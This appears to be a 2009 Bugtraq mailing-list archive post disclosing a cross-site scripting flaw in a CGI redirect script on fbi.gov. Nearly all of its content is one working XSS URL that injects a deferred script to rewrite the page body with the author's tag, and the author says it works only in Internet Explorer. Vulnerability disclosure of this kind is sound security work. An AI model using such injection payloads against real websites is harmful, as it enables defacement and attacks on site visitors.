[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

FBI XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: FBI XSS Vulnerability
From: sohrab_behroozian@xxxxxxxxx
Date: 17 Jan 2009 08:06:40 -0000

by : Matrix (S.B)

Ok it is not the first time, but they had fixed them all. It will probably be 
the third or fourth time they try to address this damn cgi! Here is the XSS 
that Matrix submitted to Securityfocus (works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'Matrix(S.B)'</script>

Prev by Date: Sagem router f@st 2404 remote reset poc
Next by Date: [ MDVSA-2009:018 ] tomcat5
Previous by thread: Sagem router f@st 2404 remote reset poc
Next by thread: [ MDVSA-2009:018 ] tomcat5
Index(es):
- Date
- Thread